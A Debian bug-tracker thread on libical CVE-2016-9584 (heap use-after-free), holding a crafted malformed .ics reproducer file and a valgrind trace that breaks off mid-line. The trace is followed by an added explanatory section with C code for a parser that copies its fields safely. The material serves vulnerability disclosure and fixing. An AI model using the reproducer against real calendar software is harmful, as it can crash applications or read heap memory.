Bug#852034: libical: CVE-2016-9584: heap use-after-free

2017-04-16 Thread Salvatore Bonaccorso
Hi

Since it looks from
http://www.openwall.com/lists/oss-security/2017/01/20/16 that it's fine to
attach the reproducer, attached is the original read62.ics from
Agustin Mista.

Regards,
Salvatore
BEGIN:VCALENDAR
VERSION;a=;b="a","a";c="a","b":2.1
PRODID:b
CALSCALE:c
b;b=;b="a";a=:
BEGIN:VTIMEZONE
TZID;b="c","c";a="c","c":a
LAST-MODIFIED:18640512T154526Z
TZURL;b=;b=:×YÌw
b;b="a":
c;a="a","c";b="a":
c:
c:
END:VTIMEZONE
BEGIN:VEVENT
DTSTAMP:18640509T123415Z
UID:a
CLASS;a=:PRIVATE
GEO;c=:5.243332;-30.705524
LAST-MODIFIED:18640509T001303Z
LOCATION;LANGUAGE="a";c="b","a":c
ORGANIZER;DIR="3¥//×";SENT-BY="+//+Gv€F»";LANGUAGE="b";a="a":w//mºÃ
 –‡
PRIORITY:-3
SEQUENCE:-3
STATUS:CONFIRMED
SUMMARY;ALTREP="h//o`R&^";LANGUAGE="c";b=;a="a","b":b
TRANSP;a="a","b":TRANSPARENT
URL;a=;a="b","c":H_õGD
RECURRENCE-ID:18640510T142133
RRULE:FREQ=MINUTELY;BYSECOND=0,0;BYMINUTE=0;BYHOUR=0,0;BYDAY=0MO;BYMONTHDAY
 =0;BYYEARDAY=0,0,0;BYMONTH=0,0,0;BYSETPOS=0,0,0;WKST=SU
RRULE;a=;c=:FREQ=HOURLY;COUNT=-2;INTERVAL=-2;BYSECOND=0,0;BYMINUTE=0,0;BYHO
 UR=0;BYDAY=0TH;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYMONTH=0,0;WKST=WE
RRULE:FREQ=DAILY;BYMINUTE=0,0;BYDAY=MO;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYWEE
 KNO=0,0;BYSETPOS=0,0;WKST=TH
RRULE;a=:FREQ=MONTHLY;COUNT=2;INTERVAL=2;BYMINUTE=0,0;BYYEARDAY=0;BYWEEKNO=
 0,0;BYSETPOS=0;WKST=WE
ATTACH:Nu//M
ATTACH;FMTTYPE=application/b;a="c":E//
?OF
ATTACH;b=;c=;VALUE=BINARY;ENCODING=BASE64:AAEA
ATTENDEE;CUTYPE=RESOURCE;MEMBER=",//;ei	";ROLE="c";RSVP=TRUE;DELEGATED-TO="
 L//N";DELEGATED-FROM="//R1","4//|sO","	//o[²";CN="a";DIR="WÍ//|<cm
 MD";a=;b="c":uK2
ATTENDEE;CUTYPE="c";MEMBER="	//xh5","RÓ//u7";ROLE=OPT-PARTICIPANT;PARTST
 AT=COMPLETED;RSVP=TRUE;DELEGATED-TO="s//·L
w1","®,OÒ";DELEGATED-FROM="
 ¤//3„"1";SENT-BY="}//!@ý_¯";CN="b";LANGUAGE="b";a="c","c";b="a","
 b":n[//½2¡
CATEGORIES;LANGUAGE="b":a
CATEGORIES;LANGUAGE="c":c
COMMENT;ALTREP="gi//À?¨3o";c="b";b=:a
COMMENT;a="c":c
COMMENT;ALTREP="//üÏ]¡";a="b";c="a","a":c
EXDATE;VALUE=DATE;a=;a="a":
EXDATE;VALUE=DATE;a="a":
REQUEST-STATUS;c=;a="a","c":0;c;c
REQUEST-STATUS;LANGUAGE="a":0.0;a;a
RELATED-TO;c="c","b";a=;RELTYPE="b":a
RELATED-TO:c
RDATE;VALUE=DATE;b="b";a="c","c":18640511
RDATE;VALUE=PERIOD;c=:18640509T110241/PT-1H1M1S
BEGIN:VALARM
ACTION;c="c","c";b="c":AUDIO
TRIGGER;VALUE=DATE-TIME:18640511T160521Z
REPEAT:1
DURATION;a=:-P-1W
ATTACH;VALUE=BINARY;ENCODING=BASE64:
c:
END:VALARM
BEGIN:VALARM
ACTION:DISPLAY
TRIGGER:PT1H-1M1S
DESCRIPTION;ALTREP="//u";LANGUAGE="b";a=:a
REPEAT:1
a;b=:
c;c=:
END:VALARM
BEGIN:VALARM
ACTION:EMAIL
TRIGGER;a="b";VALUE=DATE-TIME:18640511T010525Z
DESCRIPTION;ALTREP="L//";LANGUAGE="c":c
SUMMARY;ALTREP="Õ//8";LANGUAGE="c":b
ATTENDEE;CUTYPE=RESOURCE;ROLE=NON-PARTICIPANT;PARTSTAT=DELEGATED;RSVP=TRUE;
 DELEGATED-TO="//v",">s";SENT-BY="â";DIR="//j*"://ñ
ATTENDEE;CUTYPE=GROUP;MEMBER="X";PARTSTAT="a";RSVP=TRUE;DELEGATED-TO="//«
 ’","C//lz";DELEGATED-FROM="=//*-F";SENT-BY="h#";DIR="o//Ýl";LANGUAGE="a
 ":2//tk+
REPEAT:-1
DURATION:P1DT1H-1M-1S
ATTACH;a=;VALUE=BINARY;ENCODING=BASE64:AQE=
ATTACH;FMTTYPE=video/b;c=;VALUE=BINARY;ENCODING=BASE64:AQ==
a;a=:
b;b="b":
a:
END:VALARM
b;b="a":
b;a="c","c";c="a","c":
END:VEVENT
BEGIN:VEVENT
DTSTAMP;a="a":18640508T112617Z
UID;b="b";b="a":b
DTSTART;TZID="a";b="b";a=:18640508T060217
CLASS;a="a":CONFIDENTIAL
CREATED:18640508T060348Z
DESCRIPTION;ALTREP="£";LANGUAGE="c";b="c":b
GEO;a="a":-21.932919;0.126901
LAST-MODIFIED;a=:18640507T100353Z
ORGANIZER;DIR="
ATTENDEE;CUTYPE="c";ROLE=OPT-PARTICIPANT;DELEGATED-FROM="// ";SENT-BY="cD
 ü";DIR="P//":O//
REPEAT;c="c":-2
DURATION;b=:P0DT-1H-1M0S
a;c="c":
END:VALARM
END:VEVENT
BEGIN:VEVENT
DTSTAMP;a=:18640508T231357Z
UID;b=;c="b","a":a
DTSTART;TZID="c";c="c","c";a=:18640507T212203
CLASS;b=:c
CREATED;c=:18640507T224453Z
DESCRIPTION;ALTREP="//A1r1";a="c","a":c
GEO:2.636681;-2.271918
LAST-MODIFIED;c="c","c":18640506T095808Z
LOCATION;b="c";b="b","a":b
ORGANIZER;CN="a";DIR="VÿF";SENT-BY="c
Óï";LANGUAGE="b";b="a";a="a"
 :—t
PRIORITY;a="c":0
SEQUENCE:-1
STATUS;a="a","a";b="c":CANCELLED
TRANSP;b=;a="c":OPAQUE
URL;b=;a="a":,‚//(
RRULE;b="b","a":FREQ=MINUTELY;UNTIL=18640510T061434Z;INTERVAL=0;BYSECOND=0,
 0;BYMINUTE=0,0;BYHOUR=0;BYDAY=MO,0TU,WE;BYMONTHDAY=0;BYYEARDAY=0,0;BYWEEKN
 O=0,0,0;BYSETPOS=0,0;WKST=TU
RRULE;c="c","b";c="b":FREQ=MONTHLY;INTERVAL=-2;BYSECOND=0,0;BYHOUR=0;BYDAY=
 0SA,0WE;BYMONTH=0;BYSETPOS=0,0
RRULE;c="a":FREQ=MONTHLY;BYMINUTE=0,0,0;BYDAY=TH,0FR;BYMONTHDAY=0,0,0;BYWEE
 KNO=0,0,0;BYMONTH=0,0;BYSETPOS=0;WKST=FR
RRULE;c=:FREQ=YEARLY;COUNT=2;INTERVAL=-2;BYSECOND=0,0,0;BYHOUR=0,0,0;BYDAY=
 0SA,TU,TH;BYMONTHDAY=0,0,0;BYYEARDAY=0,0;BYWEEKNO=0,0;BYMONTH=0,0;BYSETPOS
 =0
ATTACH;FMTTYPE=c/b;b=;VALUE=BINARY;ENCODING=BASE64:AQA=
ATTENDEE;CUTYPE=GROUP;MEMBER="eú//#åW'n","§
//[áêl4j";RSVP=TRUE;DELE
 GATED-TO="3\¾=";SENT-BY="_//V";CN="a";DIR="x//QZ:,";LANGUAGE="c";c="a"
 ,"a";c=://!g
ATTENDEE;CUTYPE=ROOM;MEMBER="//zv^";ROLE=NON-PARTICIPANT;PARTSTAT=ACCEPTED;
 

Bug#852034: libical: CVE-2016-9584: heap use-after-free

2017-01-20 Thread Salvatore Bonaccorso
Source: libical
Version: 1.0-1.3
Severity: important
Tags: security upstream

Hi,

the following vulnerability was published for libical.

CVE-2016-9584[0]:
| libical allows remote attackers to cause a denial of service
| (use-after-free) and possibly read heap memory via a crafted ics file.

The SuSE bugzilla entry contains a helper parser which can be used to
trigger the issue, with the read62.ics provided by Agustin Mista (but
it is not public, and needs to be requested from Agustin Mista
currently; it should ideally be made public by the reporter though).

The issue is then reproducible under valgrind with both 1.0-1.3 and
2.0.0-0.5.

==956== Memcheck, a memory error detector
==956== Copyright (C) 2002-2015, and GNU GPL'd, by Julian Seward et al.
==956== Using Valgrind-3.12.0 and LibVEX; rerun with -h for copyright info
==956== Command: ./icaltestparser ./read62.ics
==956== 
==956== Invalid read of size 1
==956==    at 0x4C2EDA2: strlen (vg_replace_strmem.c:454)
==956==    by 0x50F3DA2: vfprintf (vfprintf.c:1637)
==956==    by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63)
==956==    by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34)
==956==    by 0x4E7D66A: icalreqstattype_as_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E7E559: icalvalue_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E7186A: icalproperty_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E6AA67: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E6AAB7: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E6AB75: icalcomponent_as_ical_string (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x108B95: main (icaltestparser.c:117)
==956==  Address 0x849c2a4 is 4 bytes inside a block of size 66 free'd
==956==    at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==956==    by 0x4E70059: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x108B7E: main (icaltestparser.c:112)
==956==  Block was alloc'd at
==956==    at 0x4C2DBC5: calloc (vg_replace_malloc.c:711)
==956==    by 0x4E6E1AD: icalmemory_new_buffer (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E6F165: ??? (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E700A4: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x108B7E: main (icaltestparser.c:112)
==956== 
==956== Invalid read of size 1
==956==    at 0x4C2EDB4: strlen (vg_replace_strmem.c:454)
==956==    by 0x50F3DA2: vfprintf (vfprintf.c:1637)
==956==    by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63)
==956==    by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34)
==956==    by 0x4E7D66A: icalreqstattype_as_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E7E559: icalvalue_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E7186A: icalproperty_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E6AA67: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E6AAB7: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E6AB75: icalcomponent_as_ical_string (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x108B95: main (icaltestparser.c:117)
==956==  Address 0x849c2a5 is 5 bytes inside a block of size 66 free'd
==956==    at 0x4C2CDDB: free (vg_replace_malloc.c:530)
==956==    by 0x4E70059: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x108B7E: main (icaltestparser.c:112)
==956==  Block was alloc'd at
==956==    at 0x4C2DBC5: calloc (vg_replace_malloc.c:711)
==956==    by 0x4E6E1AD: icalmemory_new_buffer (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E6F165: ??? (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E700A4: icalparser_add_line (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x108B7E: main (icaltestparser.c:112)
==956== 
==956== Invalid read of size 1
==956==    at 0x4C330A8: __GI_mempcpy (vg_replace_strmem.c:1518)
==956==    by 0x511FBFD: _IO_default_xsputn (genops.c:438)
==956==    by 0x50F3BDA: vfprintf (vfprintf.c:1637)
==956==    by 0x51A1975: __vsnprintf_chk (vsnprintf_chk.c:63)
==956==    by 0x51A18D7: __snprintf_chk (snprintf_chk.c:34)
==956==    by 0x4E7D66A: icalreqstattype_as_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E7E559: icalvalue_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E7186A: icalproperty_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E6AA67: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by 0x4E6AAB7: icalcomponent_as_ical_string_r (in /usr/lib/x86_64-linux-gnu/libical.so.2.0.0)
==956==    by
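The trace above shows the shape of the bug class: the block is freed inside icalparser_add_line while a line is being parsed, and is read again much later, when icalcomponent_as_ical_string serialises the REQUEST-STATUS value through icalreqstattype_as_string_r and snprintf. That pattern arises when a parsed value keeps pointers into the parser's line buffer instead of owning copies of the fields. The following is an added example, not libical's code: a minimal REQUEST-STATUS ("code;description[;extra]") parser that copies every field it retains, so the caller can free the line buffer immediately after parsing and serialisation never touches freed memory. The `reqstat_*` names are hypothetical; the sample values `0;c;c` and `0.0;a;a` are taken from the read62.ics reproducer in this thread.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Parsed REQUEST-STATUS value. Every pointer is an owned heap copy, so the
 * struct shares no memory with the line buffer it was parsed from. */
struct reqstat {
    char *code;   /* e.g. "0" or "2.0" */
    char *desc;   /* short description */
    char *extra;  /* optional extra data, NULL when absent */
};

/* Copy exactly n bytes of s into a fresh NUL-terminated string. */
static char *dup_n(const char *s, size_t n)
{
    char *p = malloc(n + 1);
    if (!p) return NULL;
    memcpy(p, s, n);
    p[n] = '\0';
    return p;
}

static char *dup_str(const char *s)
{
    return dup_n(s, strlen(s));
}

void reqstat_free(struct reqstat *r)
{
    if (!r) return;
    free(r->code);
    free(r->desc);
    free(r->extra);
    free(r);
}

/* Parse "code;desc[;extra]" from a buffer the caller owns. Returns NULL on
 * malformed input (fewer than two fields) or allocation failure. Because all
 * fields are copied, the caller may free `value` as soon as this returns. */
struct reqstat *reqstat_parse(const char *value)
{
    const char *semi1 = strchr(value, ';');
    if (!semi1) return NULL;
    const char *semi2 = strchr(semi1 + 1, ';');

    struct reqstat *r = calloc(1, sizeof *r);
    if (!r) return NULL;
    r->code  = dup_n(value, (size_t)(semi1 - value));
    r->desc  = semi2 ? dup_n(semi1 + 1, (size_t)(semi2 - semi1 - 1))
                     : dup_str(semi1 + 1);
    r->extra = semi2 ? dup_str(semi2 + 1) : NULL;
    if (!r->code || !r->desc || (semi2 && !r->extra)) {
        reqstat_free(r);
        return NULL;
    }
    return r;
}

/* Serialise into a freshly allocated string. This is the step that, in the
 * trace above, read freed memory; here it only reads the struct's own copies. */
char *reqstat_as_string(const struct reqstat *r)
{
    size_t n = strlen(r->code) + 1 + strlen(r->desc)
             + (r->extra ? 1 + strlen(r->extra) : 0) + 1;
    char *out = malloc(n);
    if (!out) return NULL;
    if (r->extra)
        snprintf(out, n, "%s;%s;%s", r->code, r->desc, r->extra);
    else
        snprintf(out, n, "%s;%s", r->code, r->desc);
    return out;
}

/* Mirror the parse-then-free-then-serialise sequence from the trace using a
 * heap line buffer as a stand-in for the parser's. Returns 1 when the round
 * trip reproduces the input, 0 on malformed input or allocation failure. */
int reqstat_roundtrip_ok(const char *value)
{
    char *line = dup_str(value);          /* the parser's line buffer */
    if (!line) return 0;
    struct reqstat *r = reqstat_parse(line);
    free(line);                           /* freed before serialisation */
    if (!r) return 0;
    char *s = reqstat_as_string(r);       /* must not depend on `line` */
    int ok = s && strcmp(s, value) == 0;
    free(s);
    reqstat_free(r);
    return ok;
}

int main(void)
{
    const char *samples[] = { "0;c;c", "0.0;a;a", "2.0;Success", "nosemicolon" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-12s -> %s\n", samples[i],
               reqstat_roundtrip_ok(samples[i]) ? "ok" : "rejected");
    return 0;
}
```

Run under valgrind or with `-fsanitize=address`, the round trip stays clean because the freed line buffer is never dereferenced after `free(line)`; the same check against a parser that stores raw pointers into its line buffer is what produced the "Invalid read ... inside a block ... free'd" reports above.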